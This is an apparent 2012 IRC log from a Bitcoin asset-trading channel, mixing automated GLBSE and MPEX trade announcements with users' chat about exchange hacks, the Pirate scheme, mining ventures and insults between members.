1btc if bitcoincia pays out Sep 05 04:40:27 i ahve bids at .91 Sep 05 04:40:33 its mostly dead Sep 05 04:40:35 lol Sep 05 04:40:41 Then let the market bleed into your .91 Sep 05 04:40:49 i have asked nefario to make a large flashing red sign saying dont buy it Sep 05 04:40:50 he wont Sep 05 04:41:05 well, i want to protect and make aware people trusting me assets... Sep 05 04:41:17 But you are waiting for bitcoinina Sep 05 04:41:41 So saying don't buy it could skew the market.. people mightg sell out, you'd buy up all the shares on the cheap etc Sep 05 04:41:54 Who is to say that someone out there doesn't know something and is not selling under 1? Sep 05 04:42:07 maybe pc is the one buying Sep 05 04:42:16 there is no way it should be wroth more than 1 btc ever Sep 05 04:42:28 [MPEX] [S.MPOE] 1700 @ 0.00040242 = 0.6841 BTC [+] Sep 05 04:42:29 [MPEX] [S.MPOE] 13659 @ 0.0004018 = 5.4882 BTC [-] Sep 05 04:42:31 [MPEX] [S.MPOE] 5241 @ 0.00040048 = 2.0989 BTC [-] Sep 05 04:42:33 assbot> [GLBSE] [TYGRR.BOT] 1 @ 1.04 BTC [+] Sep 05 04:43:37 [MPEX] [S.MPOE] 4784 @ 0.00040302 = 1.928 BTC [+] Sep 05 04:43:38 [MPEX] [S.MPOE] 40158 @ 0.00040326 = 16.1941 BTC [+] Sep 05 04:43:52 [GLBSE] [HYDRO.BONDS] 1 @ 1.559 BTC [-] Sep 05 04:47:18 [GLBSE] [OBSI.HRPT] 1 @ 0.1042889 BTC [-] Sep 05 04:50:17 rah... Sep 05 04:50:35 I keep getting undercut by 1 satoshi on everything almost instantly Sep 05 04:53:59 [MPEX] [F.GIGA.ETF] 9867 @ 0.00086192 = 8.5046 BTC [+] Sep 05 04:54:00 [MPEX] [F.GIGA.ETF] 11793 @ 0.00086378 = 10.1866 BTC [+] Sep 05 05:01:44 [MPEX] [F.GIGA.ETF] 5465 @ 0.00085631 = 4.6797 BTC [-] Sep 05 05:01:44 [MPEX] [F.GIGA.ETF] 1716 @ 0.00085578 = 1.4685 BTC [-] Sep 05 05:01:46 [MPEX] [F.GIGA.ETF] 8300 @ 0.00084532 = 7.0162 BTC [-] Sep 05 05:01:47 [MPEX] [F.GIGA.ETF] 6519 @ 0.00081485 = 5.312 BTC [-] Sep 05 05:01:58 sorry BTC-Mining :) Sep 05 05:02:04 just kidding :) Sep 05 05:02:07 [MPEX] [F.GIGA.ETF] 12800 @ 0.00081485 = 10.4301 BTC [-] Sep 05 05:08:04 [GLBSE] [FDBF] 3 @ 0.14999999 = 0.45 BTC [+] Sep 05 05:09:43 [GLBSE] [MU] 2 @ 0.39 = 0.78 BTC [-] Sep 05 05:11:05 [GLBSE] [FDBF] 3 @ 0.15 = 0.45 BTC [+] Sep 05 05:11:11 Yeah, I'll need to make a bot Sep 05 05:11:37 [MPEX] [O.BTCUSD.C010T] 592 @ 0.90552673 = 536.0718 BTC [-] Sep 05 05:14:44 this should be the official popcoin girl http://polimedia.us/dtng/c/src/134681126871.jpg Sep 05 05:17:04 nsfw btw Sep 05 05:17:07 (thanks) Sep 05 05:17:48 [GLBSE] [OBSI.HRPT] 1 @ 0.104285 BTC [-] Sep 05 05:18:04 yee Sep 05 05:19:24 The link or mircea? Sep 05 05:19:31 xD Sep 05 05:20:40 are you kidding ? i'm very safe for work Sep 05 05:22:16 yes I'm kidding Sep 05 05:22:51 http://www.youtube.com/watch?v=lHB1FN4o8VQ Sep 05 05:22:58 so there's some dumbass scam that's being spimvertised. Sep 05 05:23:20 and this idiot is doing "a review" which consists of spending 20 minutes saying he's gonna do the same thing cause it works well. Sep 05 05:23:36 [GLBSE] [ARS] 75 @ 0.01485 = 1.1138 BTC [-] Sep 05 05:23:42 considering the sort of shit that errupts every time money meets internet, i would say BTC is way ahead of the curve. Sep 05 05:24:17 [MPEX] [S.MPOE] 20800 @ 0.00040189 = 8.3593 BTC [-] Sep 05 05:27:12 [GLBSE] [ARS] 40 @ 0.01481 = 0.5924 BTC [-] Sep 05 05:28:22 Wait what? You mean the classic "Buy my 20$ book to learn how to make 20$s from people!" stupidity? Sep 05 05:28:44 yes. Sep 05 05:28:57 it's a small majority of internet monyz. Sep 05 05:29:22 actually i been half waiting to see the first btc shit in long page format with yellow highlights tbh Sep 05 05:29:29 and with a box thing Sep 05 05:29:34 small majorities are the best Sep 05 05:29:41 [GLBSE] [FPGAMINING] 8 @ 0.7299 = 5.8392 BTC [+] Sep 05 05:29:43 [GLBSE] [FPGAMINING] 2 @ 0.73 = 1.46 BTC [+] Sep 05 05:29:51 that bitfloor thing can't help creating some decent memes. Sep 05 05:29:53 [GLBSE] [BIF.1YR.LOAN] 10 @ 0.96153846 = 9.6154 BTC [+] Sep 05 05:31:17 About those long page with yellow and red highlights (with the obligated traditional blue background and big red or golden "Buy Now" button at the bottom) Sep 05 05:32:22 yea Sep 05 05:33:22 Did you know that 0.001% of them are legit? Pay 100 000 x 100$ bi-daily subscription and find out the one which actually provide hepful financial advise! Sep 05 05:33:41 Or for a better deal, just buy Finances for Dummies Sep 05 05:33:50 Your credit rating will thank you. Sep 05 05:33:51 holy shit Sep 05 05:33:57 I love this 1nject0r guy Sep 05 05:34:15 BTC-Mining it's really a very sad subculture. Sep 05 05:34:19 dub he is pretty funny Sep 05 05:34:35 [GLBSE] [FPGAMINING] 15 @ 0.73 = 10.95 BTC [+] Sep 05 05:34:44 You mean that 8 years old kid who think he has hacked a website by loading an error page? Sep 05 05:35:20 I haven't heard of him, sorry Sep 05 05:35:55 still smarter than 90% of bitcointalk Sep 05 05:36:23 lol. sad, but true. Sep 05 05:37:31 i am very curious which will be the 1st bitcoin service to reach a 5 year stretch w/o hacking. Sep 05 05:37:45 [GLBSE] [GIGAMINING] 4 @ 0.79 = 3.16 BTC [+] Sep 05 05:37:54 [MPEX] [S.MPOE] 8900 @ 0.00040236 = 3.581 BTC [+] Sep 05 05:38:41 Might be MtGox Sep 05 05:38:56 [GLBSE] [CPA] 6 @ 0.055 = 0.33 BTC [-] Sep 05 05:38:57 [GLBSE] [CPA] 1 @ 0.053 BTC [-] Sep 05 05:39:01 when was their last, may 2011 ? Sep 05 05:39:18 no, june.\ Sep 05 05:39:18 Only one to have survived a hack so far, and probably the better equipped to achieve that Sep 05 05:39:33 well bitcoinica survived ONE hack Sep 05 05:39:34 [GLBSE] [OBSI.HRPT] 3 @ 0.104275 = 0.3128 BTC [-] Sep 05 05:39:35 [GLBSE] [OBSI.HRPT] 2 @ 0.10428 = 0.2086 BTC [+] Sep 05 05:39:36 [GLBSE] [OBSI.HRPT] 29 @ 0.104285 = 3.0243 BTC [+] Sep 05 05:39:37 [GLBSE] [OBSI.HRPT] 11 @ 0.104286 = 1.1471 BTC [+] Sep 05 05:39:44 i would bet its glbse Sep 05 05:39:47 ... yeah I don't think that counts Sep 05 05:40:00 incidentally.... mtgox lost 500k coins Sep 05 05:40:04 so technically more than pirate. Sep 05 05:40:16 [GLBSE] [OBSI.HRPT] 1 @ 0.104286 BTC [+] Sep 05 05:40:18 But the VOLUME Sep 05 05:42:09 [GLBSE] [TYGRR.BOND-B] 78 @ 0.1 = 7.8 BTC [+] Sep 05 05:42:39 500k USD, not coins... Sep 05 05:43:04 where's 500k from? Sep 05 05:43:05 nono. 500k coins. Sep 05 05:43:10 that wasn't "lost" Sep 05 05:43:10 http://www.dailytech.com/Inside+the+MegaHack+of+Bitcoin+the+Full+Story/article21942.htm Sep 05 05:43:12 it was a db hack Sep 05 05:43:17 those weren't real coins Sep 05 05:43:25 the crash was artificial to exploit their withdrawal limits Sep 05 05:43:29 well yeah i guess so. Sep 05 05:43:45 the number was 432109.87654321 Sep 05 05:43:46 :D Sep 05 05:43:50 lol Sep 05 05:44:16 I think the official statement is that the guy made off with 2000 coins or so Sep 05 05:44:20 which isn't so bad Sep 05 05:44:30 assuming they aren't downplaying it, which they probably are :) Sep 05 05:44:41 [MPEX] [S.MPOE] 12000 @ 0.00040326 = 4.8391 BTC [+] Sep 05 05:45:33 no Sep 05 05:45:37 initally was claimed 25k Sep 05 05:45:45 then it was something like 1k usd worth of bitcoins Sep 05 05:45:52 at a pricer of 0.01 this is 100k Sep 05 05:46:40 [GLBSE] [BTCS] 500 @ 0.011 = 5.5 BTC [+] Sep 05 05:50:35 [GLBSE] [ASICMINER] 5 @ 0.139 = 0.695 BTC [+] Sep 05 05:51:23 [GLBSE] [ASICMINER] 1 @ 0.1399999 BTC [+] Sep 05 05:51:25 [GLBSE] [ASICMINER] 1 @ 0.13999999 BTC [+] Sep 05 06:04:41 [MPEX] [S.MPOE] 20600 @ 0.00040236 = 8.2886 BTC [-] Sep 05 06:09:38 [GLBSE] [JLP-BMD] 2 @ 0.0811 = 0.1622 BTC [-] Sep 05 06:10:37 [GLBSE] [KRAKEN] 1 @ 0.00999999 BTC [+] Sep 05 06:16:38 https://bitcoin.org.uk/forums/topic/284-new-mtgox-hack/ nothing quite like year old drama. Sep 05 06:29:09 [GLBSE] [BFLS.RIG] 1 @ 1.098 BTC [+] Sep 05 06:29:10 [GLBSE] [BFLS.RIG] 2 @ 1.0989954 = 2.198 BTC [+] Sep 05 06:39:28 [MPEX] [S.MPOE] 7284 @ 0.00040326 = 2.9373 BTC [+] Sep 05 06:39:30 [MPEX] [S.MPOE] 36069 @ 0.00040333 = 14.5477 BTC [+] **** BEGIN LOGGING AT Wed Sep 5 11:34:19 2012 Sep 05 11:36:18 BTC-Mining: same shit, different exchange :) Sep 05 11:36:31 [GLBSE] [COGNITIVE] 1 @ 0.56 BTC [-] Sep 05 11:40:21 drama ? Sep 05 11:40:32 II was just saying Sep 05 11:40:41 [04:03] For all we know, all those trading websites were made by the same guy who is completly hilarious from making the same "mistake" every time yet keep getting funds from everyone every time. Sep 05 11:40:46 [04:07] "Oh guys, I'm sorry, I was (reusing passwords because it smartly saves me time/didn't use a cold wallet because it's stupid waste even if it caused plenty of others losses before me/didn't implement any actual security practice because heck, it's completly non-convential in the financial market to have those right?). All the funds were stolen. I still have a balance Sep 05 11:40:47 in BTC/USD but there's no way I'm returning that either. Thanks, bye." Sep 05 11:41:02 ya. and his name is alberto ? Sep 05 11:41:36 You mean BDT? I was thinking bitfloor currently... Sep 05 11:41:42 [MPEX] [F.GIGA.ETF] 7296 @ 0.0007476 = 5.4545 BTC [+] Sep 05 11:41:54 BDT hasn't officially absconded from responsibility to anything. Sep 05 11:42:09 They claim no hack so far... Sep 05 11:42:28 But they found a security issue they had to correct before reopening. Sep 05 11:42:34 (or so it is claimed) Sep 05 11:43:09 actually, they lost 4k Sep 05 11:43:14 or thereabouts. Sep 05 11:43:25 Really? Ouch. Link? Sep 05 11:43:33 well doh you missed half the drama ? Sep 05 11:43:40 Or is that rumors? Sep 05 11:43:56 I haven't read it yet, so unless you can point it out... Sep 05 11:43:56 Jonathan Ryan Owens locked Rebate, Zip.A, Alberto & BDT thread Sep 05 11:44:01 https://bitcointalk.org/index.php?topic=101109.0 Sep 05 11:44:22 [GLBSE] [KRAKEN] 300 @ 0.00999999 = 3 BTC [+] Sep 05 11:46:07 >.> Sep 05 11:46:23 Is that the same Alberto and is there any official statement they lost 4k BTC? Sep 05 11:49:08 welll, people don't seem to be making official statements much. Sep 05 11:49:11 [GLBSE] [TYGRR.BOT] 4 @ 0.91 = 3.64 BTC [-] Sep 05 11:49:14 the figure comes from reddit, Sep 05 11:49:33 http://www.reddit.com/r/Bitcoin/comments/yb89v/bitdaytradecom_operator_has_already_lost_4000btc/ Sep 05 11:50:10 kronos.io did launch, it was online for a few days then it closed. seems to me this is credible. Sep 05 11:50:20 [GLBSE] [GIGAMINING] 1 @ 0.79999999 BTC [+] Sep 05 11:50:46 [GLBSE] [GIGAMINING] 1 @ 0.8 BTC [+] Sep 05 11:51:25 [GLBSE] [GIGAMINING] 1 @ 0.8 BTC [+] Sep 05 11:53:19 Forum software was compromised using a 0day exploit in SMF. Perpetrator had administrative access since September 3rd, which went unnoticed until September 9th, when they inserted the CosbyCoin defacement JavaScript. Sep 05 11:53:26 who was telling me i should use smf ? Sep 05 11:53:51 oh, the operator lost 4k in the past with Kronos... Sep 05 11:54:36 well that past couldn't be very long could it ? Sep 05 11:54:57 Indeed. We shall see. Sep 05 11:55:25 Now I'll tell all my friend I have a new drama show called "Bitcoin". Sep 05 11:55:58 Full of unrealistic scenarios and bitching. Sep 05 11:57:11 lol Sep 05 11:59:38 [MPEX] [F.GIGA.ETF] 11704 @ 0.0007476 = 8.7499 BTC [+] Sep 05 11:59:40 [MPEX] [F.GIGA.ETF] 13096 @ 0.00074876 = 9.8058 BTC [+] Sep 05 12:04:19 [MPEX] [S.MPOE] 1754 @ 0.0003997 = 0.7011 BTC [-] Sep 05 12:04:21 [MPEX] [S.MPOE] 14600 @ 0.00039967 = 5.8352 BTC [-] Sep 05 12:04:22 [MPEX] [S.MPOE] 17502 @ 0.00039964 = 6.9945 BTC [-] Sep 05 12:04:23 [MPEX] [S.MPOE] 4244 @ 0.000399 = 1.6934 BTC [-] Sep 05 12:16:46 [MPEX] [F.GIGA.ETF] 5104 @ 0.00074876 = 3.8217 BTC [+] Sep 05 12:16:47 [MPEX] [F.GIGA.ETF] 10600 @ 0.00075113 = 7.962 BTC [+] Sep 05 12:16:48 [MPEX] [F.GIGA.ETF] 4296 @ 0.00081 = 3.4798 BTC [+] Sep 05 12:26:58 well off I go Sep 05 12:29:41 [GLBSE] [GIGAMINING] 1 @ 0.7999 BTC [-] Sep 05 12:35:35 bye btc-mining Sep 05 12:37:29 morning :) Sep 05 12:38:21 morning Sep 05 12:38:35 deadt, want to buy back all that pirate debt? lol Sep 05 12:41:12 [MPEX] [S.MPOE] 2794 @ 0.0004008 = 1.1198 BTC [+] Sep 05 12:41:14 [MPEX] [S.MPOE] 12431 @ 0.00040333 = 5.0138 BTC [+] Sep 05 12:43:59 [MPEX] [S.MPOE] 10500 @ 0.00040427 = 4.2448 BTC [+] Sep 05 12:44:01 [MPEX] [S.MPOE] 10100 @ 0.0004044 = 4.0844 BTC [+] Sep 05 12:44:02 [MPEX] [S.MPOE] 16244 @ 0.0004048 = 6.5756 BTC [+] Sep 05 12:44:21 [MPEX] [S.MPOE] 13000 @ 0.00040414 = 5.2538 BTC [-] Sep 05 12:44:52 ehm no it's cool xD Sep 05 12:45:05 What will come of TyGrr.Tech btw? Sep 05 12:48:04 [MPEX] [F.GIGA.ETF] 9646 @ 0.00074033 = 7.1412 BTC [-] Sep 05 12:48:05 [MPEX] [F.GIGA.ETF] 5369 @ 0.00072379 = 3.886 BTC [-] Sep 05 12:48:07 [MPEX] [F.GIGA.ETF] 9300 @ 0.00070635 = 6.5691 BTC [-] Sep 05 12:48:08 [MPEX] [F.GIGA.ETF] 3785 @ 0.00070427 = 2.6657 BTC [-] Sep 05 12:50:07 right now plan is to sell off hardware Sep 05 12:51:12 i have the rigs listed Sep 05 12:52:02 Chaang-Noi: why, what happened? Sep 05 12:54:52 Okay :) Sep 05 12:55:09 each share can be traded for $15 right? Sep 05 12:55:20 what? Sep 05 12:55:33 no, i highly doubt the hardware is worth that much Sep 05 12:55:48 hm seems to be gone Sep 05 12:56:19 ? Sep 05 12:57:20 sorry my fault xD remembered incorrectly Sep 05 13:08:36 [GLBSE] [ASICMINER] 9 @ 0.13 = 1.17 BTC [-] Sep 05 13:09:33 [GLBSE] [FPGAMINING] 1 @ 0.72999999 BTC [-] Sep 05 13:09:34 [GLBSE] [FPGAMINING] 1 @ 0.73 BTC [+] Sep 05 13:16:18 [MPEX] [S.MPOE] 16746 @ 0.00040414 = 6.7677 BTC [-] Sep 05 13:22:39 [MPEX] [S.MPOE] 24600 @ 0.000399 = 9.8154 BTC [-] Sep 05 13:23:16 [GLBSE] [FPGAMINING] 1 @ 0.73 BTC [+] Sep 05 13:27:08 [MPEX] [S.MPOE] 1156 @ 0.000399 = 0.4612 BTC [-] Sep 05 13:27:09 [MPEX] [S.MPOE] 244 @ 0.00039865 = 0.0973 BTC [-] Sep 05 13:30:35 Chaang-Noi: why not just sell the gpu hardware and buy an asic rig? Sep 05 13:32:53 [GLBSE] [BMMO] 2 @ 0.08 = 0.16 BTC [+] Sep 05 13:35:06 [GLBSE] [OBSI.HRPT] 8 @ 0.1042889 = 0.8343 BTC [+] Sep 05 13:38:54 [GLBSE] [OBSI.HRPT] 10 @ 0.1042889 = 1.0429 BTC [+] Sep 05 13:43:30 nefario how be the legalization going? Sep 05 13:44:05 I think I remember saying nothing will be happening until next week Sep 05 13:44:19 mornin Sep 05 13:44:20 lol, if i could read everything everyone writes Sep 05 13:44:20 Im waiting to get some documents Sep 05 13:44:25 morning Sep 05 13:44:31 wont have them until saturday Sep 05 13:44:38 okay, good luck i guess Sep 05 13:45:21 on that comment about ID Sep 05 13:46:12 [GLBSE] [BDT] 1 @ 1.05 BTC [-] Sep 05 13:58:55 [GLBSE] [BDT] 4 @ 1.03 = 4.12 BTC [-] Sep 05 14:01:28 anyone have an BDT I can borrow? Sep 05 14:01:33 any* Sep 05 14:01:45 ill pay double dividends Sep 05 14:04:48 Chaang-Noi, speculating for a crash? Sep 05 14:05:38 if i were to speculat yeah... Sep 05 14:05:44 can i borrow? Sep 05 14:07:42 [MPEX] [S.MPOE] 53200 @ 0.00039943 = 21.2497 BTC [+] Sep 05 14:15:00 [GLBSE] [FPGAMINING] 1 @ 0.73 BTC [+] Sep 05 14:25:50 [GLBSE] [FPGAMINING] 5 @ 0.73 = 3.65 BTC [+] Sep 05 14:28:32 [GLBSE] [BMMO] 3 @ 0.07999999 = 0.24 BTC [-] Sep 05 14:28:34 [GLBSE] [BMMO] 16 @ 0.08 = 1.28 BTC [+] Sep 05 14:28:35 [GLBSE] [BMMO] 6 @ 0.0899999 = 0.54 BTC [+] Sep 05 14:28:36 [GLBSE] [BMMO] 10 @ 0.0923 = 0.923 BTC [+] Sep 05 14:28:37 [GLBSE] [BMMO] 15 @ 0.0925 = 1.3875 BTC [+] Sep 05 14:29:55 [GLBSE] [V.HRL] 5 @ 0.99999 = 5 BTC [-] Sep 05 14:41:00 [GLBSE] [TYGRR.BOND-A] 2 @ 0.12 = 0.24 BTC [-] Sep 05 14:43:59 [MPEX] [F.GIGA.ETF] 2500 @ 0.00081 = 2.025 BTC [+] Sep 05 14:45:58 [GLBSE] [V.HRL] 3 @ 1 = 3 BTC [+] Sep 05 14:48:37 [GLBSE] [KRAKEN] 150 @ 0.00999999 = 1.5 BTC [+] Sep 05 14:50:17 [GLBSE] [PUREMINING] 6 @ 0.09567 = 0.574 BTC [+] Sep 05 14:54:48 [GLBSE] [FPGA.CONTRACT] 2 @ 0.06 = 0.12 BTC [-] Sep 05 14:54:50 [GLBSE] [FPGA.CONTRACT] 4 @ 0.0575001 = 0.23 BTC [-] Sep 05 14:54:51 [GLBSE] [FPGA.CONTRACT] 10 @ 0.0575 = 0.575 BTC [-] Sep 05 14:54:51 [GLBSE] [FPGA.CONTRACT] 180 @ 0.055 = 9.9 BTC [-] Sep 05 14:54:53 [GLBSE] [FPGA.CONTRACT] 9 @ 0.052 = 0.468 BTC [-] Sep 05 15:03:26 [MPEX] [S.MPOE] 19953 @ 0.00039865 = 7.9543 BTC [-] Sep 05 15:05:51 [GLBSE] [YABMC] 1 @ 0.11 BTC [-] Sep 05 15:05:57 hi, who is around? Sep 05 15:06:17 [GLBSE] [YABMC] 11 @ 0.11 = 1.21 BTC [-] Sep 05 15:06:43 [GLBSE] [YABMC] 10 @ 0.1072 = 1.072 BTC [-] Sep 05 15:08:20 [GLBSE] [GIGAMINING] 7 @ 0.79 = 5.53 BTC [-] Sep 05 15:14:09 [MPEX] [S.MPOE] 25016 @ 0.00039865 = 9.9726 BTC [-] Sep 05 15:14:11 [MPEX] [S.MPOE] 29984 @ 0.00039826 = 11.9414 BTC [-] Sep 05 15:14:32 Chaang-Noi ? Sep 05 15:14:47 [GLBSE] [FOO.PPPPT] 20 @ 0.1 = 2 BTC [+] Sep 05 15:15:54 hi kakobrekla, false alarm :) Sep 05 15:19:48 sorry mate Sep 05 15:31:50 [GLBSE] [RAREEARTH] 2 @ 0.0091 = 0.0182 BTC [-] Sep 05 15:32:20 [GLBSE] [GOLD] 3 @ 0.009001 = 0.027 BTC [-] Sep 05 15:32:45 [GLBSE] [RAREEARTH] 2 @ 0.00902 = 0.018 BTC [-] Sep 05 15:33:16 [GLBSE] [SILVER] 4 @ 0.00910012 = 0.0364 BTC [-] Sep 05 15:34:06 ahh all good stuff if you really hold physical Sep 05 15:45:16 [GLBSE] [ASICMINER] 5 @ 0.13 = 0.65 BTC [-] Sep 05 15:46:09 if a goat@ Sep 05 15:46:15 was on a boat Sep 05 15:46:21 [GLBSE] [RSM] 1 @ 0.2999 BTC [-] Sep 05 15:46:24 would a boat goat a moat? Sep 05 15:55:01 This pirate situation better be over soon... peopel are losing their mind.... Sep 05 15:56:09 [GLBSE] [JLP-BMD] 2 @ 0.09989 = 0.1998 BTC [+] Sep 05 15:57:02 [GLBSE] [COGNITIVE] 2 @ 0.6349 = 1.2698 BTC [+] Sep 05 15:57:07 Looking to sell a 200 BTC BitcoinMax account anyone interested? Sep 05 15:59:57 deadterra 5 solidcoins Sep 05 16:00:09 5 solid and 1 namecoin Sep 05 16:01:11 more than i will ever pay Sep 05 16:01:55 so anyone chasing pirate yet Sep 05 16:02:16 wait until 10th Sep 05 16:02:25 whats then Sep 05 16:02:27 then piles of shit will fall on mk kinny Sep 05 16:02:35 texas Sep 05 16:02:39 hm? Sep 05 16:02:51 i dont understand Sep 05 16:07:34 people will try and make a new goatse out of pirate on the 10th Sep 05 16:07:55 or at least file wire fraud charges that will be the start of priates new very large asshole Sep 05 16:21:41 [GLBSE] [NYAN.A] 50 @ 1.01 = 50.5 BTC [+] Sep 05 16:22:11 [GLBSE] [NYAN.B] 40 @ 1 = 40 BTC [+] Sep 05 16:23:58 [MPEX] [S.MPOE] 4583 @ 0.00039943 = 1.8306 BTC [+] Sep 05 16:24:00 [MPEX] [S.MPOE] 17069 @ 0.00039979 = 6.824 BTC [+] Sep 05 16:24:55 i think we need a btc lets just go the fuck crazy day Sep 05 16:25:41 [GLBSE] [NYAN.C] 10 @ 0.78 = 7.8 BTC [+] Sep 05 16:25:43 [GLBSE] [NYAN.C] 10 @ 0.79 = 7.9 BTC [+] Sep 05 16:31:23 [GLBSE] [FPGAMINING] 11 @ 0.73 = 8.03 BTC [+] Sep 05 16:33:04 lol EskimoBob is still trolling on the dmc thread Sep 05 16:49:27 [MPEX] [S.MPOE] 24700 @ 0.00039993 = 9.8783 BTC [+] Sep 05 16:51:52 [GLBSE] [ASICMINER] 3 @ 0.13 = 0.39 BTC [-] Sep 05 16:53:08 [GLBSE] [ASICMINER] 5 @ 0.14 = 0.7 BTC [+] Sep 05 16:55:46 Diablo-D3: what do you mean by trolling? Sep 05 16:56:39 I read the stuff he writes and looks like the problem is not EskimoBob but you :) Sep 05 16:57:21 I do not have any DMC but even if half of this is true Sep 05 16:58:37 you have fucked up badly and looks like people are not happy with your lack of management skills Sep 05 16:58:46 EB250: he seems to think that DMC isnt already moving forwards Sep 05 16:58:52 I dont even know why hes trying to stop it Sep 05 16:58:55 maybe hes a shill for rg Sep 05 16:59:08 i paid him to do it Sep 05 16:59:13 I KNEW IT Sep 05 16:59:23 how much? Sep 05 16:59:26 as if id pay that chump for anything Sep 05 16:59:33 hes the only one person i have /ignore'd Sep 05 16:59:50 rg: nice Sep 05 17:12:53 rg: so I wonder how well this is going to go Sep 05 17:13:55 im imagining pretty slow Sep 05 17:14:23 well, Ill be the only one selling high end dedis for btc Sep 05 17:15:22 [GLBSE] [DMC] 5 @ 0.075 = 0.375 BTC [+] Sep 05 17:15:53 [GLBSE] [GIGAMINING] 1 @ 0.799 BTC [+] Sep 05 17:16:12 http://www.youtube.com/watch?v=o66FUc61MvU Sep 05 17:16:44 lol who keeps buying that shit Sep 05 17:17:18 buying what, giga? Sep 05 17:17:20 who knows Sep 05 17:17:22 its massively overpriced Sep 05 17:17:35 [GLBSE] [LTC-MINING] 1 @ 0.65 BTC [-] Sep 05 17:18:11 [GLBSE] [TYGRR.BOND-P] 10 @ 0.09999 = 0.9999 BTC [-] Sep 05 17:18:31 lol i sold ltcmining and bond p Sep 05 17:22:04 hey guys Sep 05 17:22:07 who is bitfloor? Sep 05 17:22:30 because Ive never heard of them Sep 05 17:22:43 and they're claiming 24k btc was stolen Sep 05 17:22:47 and I _really_ doubt that Sep 05 17:23:19 Bitfloor is legit Sep 05 17:23:42 Roman is a decent guy - maybe not a security expert though... Sep 05 17:24:25 he needs to be beat then Sep 05 17:24:33 who the fuck puts 24k btc in a hot wallet Sep 05 17:26:08 it wasnt Sep 05 17:26:19 they snagged an old backup of the wallet Sep 05 17:26:29 but... Sep 05 17:26:36 um Sep 05 17:26:38 why dont you read the forum post before you continue Sep 05 17:26:44 why wasnt the backup encrypted? Sep 05 17:27:00 it's all explained in the post :) Sep 05 17:27:08 [GLBSE] [HYDRO.BONDS] 1 @ 1.559 BTC [-] Sep 05 17:27:25 I didnt see the thread Sep 05 17:27:29 just the news picking it up Sep 05 17:28:40 [GLBSE] [FPGAMINING] 10 @ 0.74 = 7.4 BTC [+] Sep 05 17:28:55 this whole clusterfuck makes my head hurt Sep 05 17:29:01 why the fuck dont people take basic precautions Sep 05 17:29:12 rg: back me up here and tell me Im not crazy Sep 05 17:29:49 are you guys talking to d3? Sep 05 17:29:53 only he could be that stupid Sep 05 17:30:57 Diablo-D3: everyone makes mistakes Sep 05 17:31:09 $252k mistakes Sep 05 17:31:09 :) Sep 05 17:31:14 not with that much money Sep 05 17:31:32 and will someone just kickban goat already? Sep 05 17:31:35 he doesnt belong in here Sep 05 17:31:43 whats going on Sep 05 17:31:43 umm Sep 05 17:31:48 [GLBSE] [DMC] 1 @ 0.075 BTC [+] Sep 05 17:31:50 goats a mad cunt Sep 05 17:31:51 its a public channel Sep 05 17:31:57 dont kick him Sep 05 17:31:58 he has as much right to beh ere as you Sep 05 17:32:05 lol so it is d3 haha Sep 05 17:32:08 [GLBSE] [ASICMINER] 2 @ 0.147 = 0.294 BTC [+] Sep 05 17:32:10 [GLBSE] [ASICMINER] 3 @ 0.1497889 = 0.4494 BTC [+] Sep 05 17:32:11 [GLBSE] [DMC] 1 @ 0.075 BTC [+] Sep 05 17:32:44 rg: yes, but at least I dont scam investors Sep 05 17:32:48 i will let d3 be d3 and will sleep, night everyone :) Sep 05 17:32:58 he didn't intentionally scam anyone Sep 05 17:33:00 pirate scammed him Sep 05 17:33:05 no, I meant his mining shit Sep 05 17:33:13 oh i dont know anything about that Sep 05 17:33:16 so i wont comment Sep 05 17:33:20 [GLBSE] [BIB.BVPS] 23 @ 0.00445 = 0.1024 BTC [-] Sep 05 17:33:22 neither do I, I just remember people bitching about it Sep 05 17:41:36 [GLBSE] [FPGAMINING] 3 @ 0.74 = 2.22 BTC [+] Sep 05 17:43:56 [MPEX] [F.GIGA.ETF] 9000 @ 0.00080701 = 7.2631 BTC [-] Sep 05 17:45:40 [MPEX] [F.GIGA.ETF] 5100 @ 0.00080701 = 4.1158 BTC [-] Sep 05 17:48:17 [GLBSE] [BIF.1YR.LOAN] 31 @ 0.96153846 = 29.8077 BTC [+] Sep 05 17:48:19 [GLBSE] [BIF.1YR.LOAN] 19 @ 0.98076923 = 18.6346 BTC [+] Sep 05 17:55:37 "Diablo-D3 | rg: yes, but at least I dont scam investors " No shit! This is exactly what you did with DMC Sep 05 17:55:39 LOL Sep 05 17:55:58 amazing Sep 05 17:58:23 EskimoBob: okay, so, if I "scammed investors" then why havent I bought my own caribbean island yet Sep 05 17:58:35 [GLBSE] [BITCOINTORRENTZ] 6 @ 0.749 = 4.494 BTC [+] Sep 05 17:58:37 [GLBSE] [BITCOINTORRENTZ] 4 @ 0.75 = 3 BTC [+] Sep 05 18:00:22 buy your logic, or rather lack of it, every scammer has a island. No wonder DMC is worth nothing ... LOL Sep 05 18:00:44 you are amazingly stupid man. Honestly. Sep 05 18:01:01 [MPEX] [S.MPOE] 8800 @ 0.00040094 = 3.5283 BTC [+] Sep 05 18:01:03 [MPEX] [S.MPOE] 19700 @ 0.00040398 = 7.9584 BTC [+] Sep 05 18:01:04 [MPEX] [S.MPOE] 9656 @ 0.0004048 = 3.9087 BTC [+] Sep 05 18:01:05 [MPEX] [S.MPOE] 18600 @ 0.00040503 = 7.5336 BTC [+] Sep 05 18:01:06 [MPEX] [S.MPOE] 893 @ 0.00040503 = 0.3617 BTC [+] Sep 05 18:01:07 Im stupid because Im making fun of you? thats not quite how it works Sep 05 18:01:32 you seriously think pirate and that bitcoinica guy own an island Sep 05 18:01:37 you're pathetic Sep 05 18:02:57 let me quote you your own stupidity "Diablo-D3 | EskimoBob: okay, so, if I "scammed investors" then why havent I bought my own caribbean island yet " Sep 05 18:03:36 [GLBSE] [DMC] 10 @ 0.053 = 0.53 BTC [-] Sep 05 18:03:38 [GLBSE] [DMC] 7 @ 0.05110001 = 0.3577 BTC [-] Sep 05 18:03:39 [GLBSE] [DMC] 5 @ 0.0361011 = 0.1805 BTC [-] Sep 05 18:03:39 fyi - there are lots of islands that arent't that expensive Sep 05 18:03:40 [GLBSE] [DMC] 250 @ 0.036101 = 9.0253 BTC [-] Sep 05 18:03:41 http://www.privateislandsonline.com/islands?forsale_start=1&forsale_end=2 Sep 05 18:03:44 :) Sep 05 18:04:13 [MPEX] [F.GIGA.ETF] 13000 @ 0.00080386 = 10.4502 BTC [-] Sep 05 18:04:15 [MPEX] [F.GIGA.ETF] 1228 @ 0.00080701 = 0.991 BTC [+] Sep 05 18:04:24 exahash: he wasted the BTC on who know what. There is nothing left to bu a island ... LOL ! Sep 05 18:05:01 !pl DMC 1@0.85 Sep 05 18:05:01 Requesting data from 